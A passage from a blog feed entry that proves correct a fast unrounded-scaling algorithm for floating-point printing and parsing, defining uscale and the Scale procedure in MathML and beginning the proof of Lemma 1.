research!rsctag:research.swtch.com,2012:research.swtch.com2026-01-19T16:47:00-05:00Russ Coxhttps://swtch.com/~rscrsc@swtch.comFast Unrounded Scaling: Proof by Ivytag:research.swtch.com,2012:research.swtch.com/fp-proof2026-01-19T16:46:00-05:002026-01-19T16:48:00-05:00Proof that the fast unrounded scaling implementation is correct. (Floating Point Formatting, Part 4)
<p>
My post “<a href="fp">Floating-Point Printing and Parsing Can Be Simple And Fast</a>”
depends on fast unrounded scaling, defined as:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo>⟨</mo><mi>x</mi><mo>⟩</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>2</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo>⟨</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>⟩</mo></mrow></mtd></mtr></mtable></math></div>
<p>
The unrounded form of <math><mrow><mi>x</mi><mo>∈</mo><mi>ℝ</mi></mrow></math>, <math><mrow><mo>⟨</mo><mi>x</mi><mo>⟩</mo></mrow></math>, is the integer value of <math><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow></math> concatenated
with two more bits:
first, the “½ bit” from the binary representation of <math><mi>x</mi></math> (the bit representing <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mn>1</mn></mrow></msup></mrow></math>; <math><mn>1</mn></math> if <math><mrow><mi>x</mi><mo>−</mo><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo><mo>≥</mo><mn>½</mn></mrow></math>; or equivalently, <math><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><MO>mod</MO><mn>2</mn></mrow></math>); and second,
a “sticky bit” that is 1 if <i>any</i> bits beyond the ½ bit were 1.
<p>
These are all equivalent definitions, using the convention that a boolean condition is 1 for true, 0 for false:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><mo>⟨</mo><mi>x</mi><mo>⟩</mo></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mi>x</mi><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo>≥</mo><mn>½</mn><mo stretchy=false>)</mo><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mi>x</mi><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo>∉</mo><mrow><mn>0</mn><mo>,</mo><mn>½</mn></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(‘</mtext><mn>||</mn><mrow><mtext>’</mtext><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>bit</mtext><mspace width='0.3em' /><mtext>concatenation)</mtext></mrow></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mi>x</mi><mo>−</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo>≥</mo><mn>½</mn><mo stretchy=false>)</mo><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>2</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd><mrow></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>2</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd><mrow></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>|</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>2</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mtext>(‘</mtext><mn>|</mn><mrow><mtext>’</mtext><mspace width='0.3em' /><mtext>is</mtext><mspace width='0.3em' /><mtext>bitwise</mtext><mspace width='0.3em' /><mtext>OR)</mtext></mrow></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mspace width='0.166em' /><mspace width='0.166em' /><mn>|</mn><mspace width='0.166em' /><mspace width='0.166em' /><mo stretchy=false>(</mo><mn>4</mn><mi>x</mi><mo>≠</mo><mrow><mo stretchy=false>⌊</mo><mn>4</mn><mi>x</mi><mo stretchy=false>⌋</mo></mrow><mo stretchy=false>)</mo></mrow></mtd><mtd><mrow></mrow></mtd></mtr></mtable></math></div>
<p>
The <math><mtext>uscale</mtext></math> operation computes the unrounded form of <math><mrow><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>,
so it needs to compute the integer <math><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></math>
and then also whether the floor truncated any bits.
One approach would be to compute <math><mrow><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> as an exact rational,
but we want to avoid arbitrary-precision math.
A faster approach is to use a floating-point approximation for <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math>:
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>≈</mo><MI>𝑝𝑚</MI><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup></mrow></math>, where <math><MI>𝑝𝑚</MI></math> is 128 bits.
Assuming <math><mrow><mi>x</mi><mo><</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>64</mn></msup></mrow></math>, this requires a single 64×128→192-bit multiplication,
implemented by two full-width 64×64→128-bit multplications on a 64-bit computer.
<p>
The algorithm, which we will call <math><mtext>Scale</mtext></math>, is given integers <math><mi>x</mi></math>, <math><mi>e</mi></math>, and <math><mi>p</mi></math> subject to certain constraints
and operates as follows:
<p>
<math><mrow><mtext>Scale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>:
<ol>
<li>
Let <math><mrow><MI>𝑝𝑒</MI><mo>=</mo><MO form='prefix'>−</MO><mn>127</mn><mo>−</mo><mrow><mo stretchy=false>⌈</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo stretchy=false>⌉</mo></mrow></mrow></math>.
<li>
Let <math><mrow><MI>𝑝𝑚</MI><mo>=</mo><mrow><mo stretchy=false>⌈</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup><mo stretchy=false>⌉</mo></mrow></mrow></math>, looked up in a table indexed by <math><mi>p</mi></math>.
<li>
Let <math><mrow><mi>b</mi><mo>=</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math>, the number of bits in the binary representation of <math><mi>x</mi></math>.
<li>
Let <math><mrow><mi>m</mi><mo>=</mo><mi>e</mi><mo>+</mo><MI>𝑝𝑒</MI><mo>+</mo><mi>b</mi><mo>−</mo><mn>1</mn></mrow></math>.
<li>
Let <math><mrow><MI>𝑡𝑜𝑝</MI><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>,</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>,</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>. <br>
Put another way, split <math><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI></mrow></math> into <math><mrow><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><mi>b</mi><mi>o</mi><mi>t</mi><mi>t</mi><mi>o</mi><mi>m</mi></mrow></math> where <math><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI></math> is <math><mi>b</mi></math> bits, <math><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI></math> is <math><mi>m</mi></math> bits, and <math><MI>𝑡𝑜𝑝</MI></math> is the remaining bits.
<li>
Return <math><mrow><mo>⟨</mo><mo stretchy=false>(</mo><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo stretchy=false>)</mo><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mn>1</mn></mrow></msup><mo>⟩</mo></mrow></math>, computed as <math><mrow><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math> or as <math><mrow><MI>𝑡𝑜𝑝</MI><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math>.</ol>
<p>
The initial <code>uscale</code> implementation in the main post uses <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math> in its result,
but an optimized version uses <math><mrow><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><mo>≥</mo><mn>2</mn><mo stretchy=false>)</mo></mrow></math>.
<p>
This post proves both versions of <math><mtext>Scale</mtext></math> correct for the <math><mi>x</mi></math>, <math><mi>e</mi></math>, and <math><mi>p</mi></math>
needed by the three floating-point conversion algorithms in the main post.
Those algorithms are:
<ul>
<li>
<p>
<code>FixedWidth</code> converts floating-point to decimal.
It needs to call <math><mtext>Scale</mtext></math> with a 53-bit <math><mi>x</mi></math>, <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1137</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>307</mn><mo>,</mo><mn>341</mn><mo stretchy=false>]</mo></mrow></math>,
chosen to produce a result <math><mrow><mi>r</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>18</mn></msup><mo stretchy=false>)</mo></mrow></math>, which is at most 61 bits
(62-bit output; <math><mrow><mi>b</mi><mo>=</mo><mn>53</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>128</mn><mo>−</mo><mn>62</mn><mo>=</mo><mn>66</mn></mrow></math>).
<li>
<p>
<code>Short</code> also converts floating-point to decimal.
It needs to call <math><mtext>Scale</mtext></math> with a 55-bit <math><mi>x</mi></math>, <math><mrow><mi>e</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>1137</mn><mo>,</mo><mn>960</mn><mo stretchy=false>]</mo></mrow></math>, and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>292</mn><mo>,</mo><mn>324</mn><mo stretchy=false>]</mo></mrow></math>,
chosen to produce a result <math><mrow><mi>r</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mn>18</mn></msup><mo stretchy=false>)</mo></mrow></math>, still at most 61 bits.
(62-bit output; <math><mrow><mi>b</mi><mo>=</mo><mn>55</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>128</mn><mo>−</mo><mn>62</mn><mo>=</mo><mn>66</mn></mrow></math>).
<li>
<p>
<code>Parse</code> converts decimal to floating-point.
It needs to call <math><mtext>Scale</mtext></math> with a 64-bit <math><mi>x</mi></math> and <math><mrow><mi>p</mi><mo>∈</mo><mo stretchy=false>[</mo><MO form='prefix'>−</MO><mn>343</mn><mo>,</mo><mn>289</mn><mo stretchy=false>]</mo></mrow></math>,
chosen to produce a result <math><mrow><mi>r</mi><mo>∈</mo><mo stretchy=false>[</mo><mn>0</mn><mo>,</mo><mn>2</mn><msup><mspace height='0.66em' /><mn>54</mn></msup><mo stretchy=false>)</mo></mrow></math>, which is at most 54 bits
(55-bit output; <math><mrow><mi>b</mi><mo>=</mo><mn>64</mn><mo>,</mo><mi>m</mi><mo>≥</mo><mn>128</mn><mo>−</mo><mn>55</mn><mo>=</mo><mn>73</mn></mrow></math>).</ul>
<p>
The “output” bit counts include the ½ bit but not the sticky bit.
Note that for a given <math><mi>x</mi></math> and <math><mi>p</mi></math>, the maximum result size
determines a relatively narrow range of possible <math><mi>e</mi></math>.
<p>
To start the proof, consider a hypothetical algorithm <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math>
that is the same as <math><mtext>Scale</mtext></math> except using exact real numbers.
(Technically, only rationals are required, so this <i>could</i> be implemented, but it is only a thought experiment.)
<p>
<math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>:
<ol>
<li>
Let <math><mrow><MI>𝑝𝑒</MI><mo>=</mo><MO form='prefix'>−</MO><mn>127</mn><mo>−</mo><mrow><mo stretchy=false>⌈</mo><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub><mspace width='0.166em' /></mrow><mn>10</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>p</mi></mrow></msup><mo stretchy=false>⌉</mo></mrow></mrow></math>.
<li>
Let <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup></mrow></math>. <br>
(Note: <math><mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is an exact value, not a ceiling.)
<li>
Let <math><mrow><mi>b</mi><mo>=</mo><mtext>bits</mtext><mo stretchy=false>(</mo><mi>x</mi><mo stretchy=false>)</mo></mrow></math>.
<li>
Let <math><mrow><mi>m</mi><mo>=</mo><mo>−</mo><mi>e</mi><mo>−</mo><mi>p</mi><mi>e</mi><mo>−</mo><mi>b</mi><mo>−</mo><mn>1</mn></mrow></math>.
<li>
Let <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><mo>,</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>,</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>=</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup></mrow></math>. <br>
(Note: <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> and <math><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> are integers, but <math><mrow><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> is an exact value that may not be an integer.)
<li>
Return <math><mrow><mo>⟨</mo><mo stretchy=false>(</mo><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo stretchy=false>)</mo><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mi>b</mi><MO lspace='0' rspace='0'>+</MO><mi>m</mi><MO lspace='0' rspace='0'>+</MO><mn>1</mn></mrow></msup><mo>⟩</mo></mrow></math>, computed as <math><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><mn>||</mn><mspace width='0.166em' /><mo stretchy=false>(</mo><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mspace width='0.166em' /><MO>||</MO><mspace width='0.166em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mo stretchy=false>)</mo></mrow></math>.</ol>
<p>
Using exact reals makes it straighforward to prove <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> correct.
<div class=lemma id=lemma1>
<p>
<b>Lemma 1</b>. <math><mrow><mtext>Scale</mtext><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></math> computes <math><mrow><mtext>uscale</mtext><mo stretchy=false>(</mo><mi>x</mi><mo>,</mo><mi>e</mi><mo>,</mo><mi>p</mi><mo stretchy=false>)</mo></mrow></math>.
<p>
<i>Proof</i>. Expand the math in the final result:<div class=math><math display=block><mtable><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><MI>𝑡𝑜𝑝</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mn>/2</mn><msup><mspace height='0.66em' /><MI>𝑝𝑒</MI></msup><mn>/2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><mi>e</mi><mo>−</mo><MI>𝑝𝑒</MI><mo>−</mo><mi>b</mi><mo>−</mo><mn>1</mn></mrow></msup><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><mi>m</mi><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mo>−</mo><MI>𝑝𝑒</MI><mo>+</mo><mi>e</mi><mo>+</mo><MI>𝑝𝑒</MI><mo>+</mo><mi>b</mi><mo>+</mo><mn>1</mn><mo>−</mo><mi>b</mi></mrow></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[rearranging]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>e</mi><mo>+</mo><mn>1</mn></mrow></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mo stretchy=false>⌊</mo><mn>2</mn><mo>·</mo><mi>x</mi><mo>·</mo><mn>2</mn><msup><mspace height='0.66em' /><mi>e</mi></msup><mo>·</mo><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup><mo stretchy=false>⌋</mo></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[rearranging]</mtext></mtd></mtr><mtr><mtd style='text-align: right; text-align: -webkit-right; text-align: -moz-right;'><mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn><mspace width='0.3em' /><mtext>or</mtext><mspace width='0.3em' /><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>≠</mo><mn>0</mn></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo stretchy=false>⌊</mo><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><mn>/2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo stretchy=false>⌋</mo></mrow><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>m</mi></msup><mo>≠</mo><mn>0</mn><mspace width='0.3em' /><mtext>or</mtext><mspace width='0.3em' /><mi>x</mi><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mi>b</mi></msup><mo>≠</mo><mn>0</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mtext>[definition</mtext><mspace width='0.3em' /><mtext>of</mtext><mspace width='0.3em' /></mrow><MI>𝑚𝑖𝑑𝑑𝑙𝑒</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mo>,</mo><MI>𝑏𝑜𝑡𝑡𝑜𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><mtext>]</mtext></mrow></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mi>x</mi><mo>·</mo><MI>𝑝𝑚</MI><msup><mspace height='0.66em' /><mi>ℝ</mi></msup><MO>mod</MO><mn>2</mn><msup><mspace height='0.66em' /><mrow><mi>m</mi><mo>+</mo><mi>b</mi></mrow></msup><mo>≠</mo><mn>0</mn></mrow></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mtext>[simplifying]</mtext></mtd></mtr><mtr><mtd><mrow></mrow></mtd><mtd><mo>=</mo></mtd><mtd style='text-align: left; text-align: -webkit-left; text-align: -moz-left;'><mrow><mrow><mo 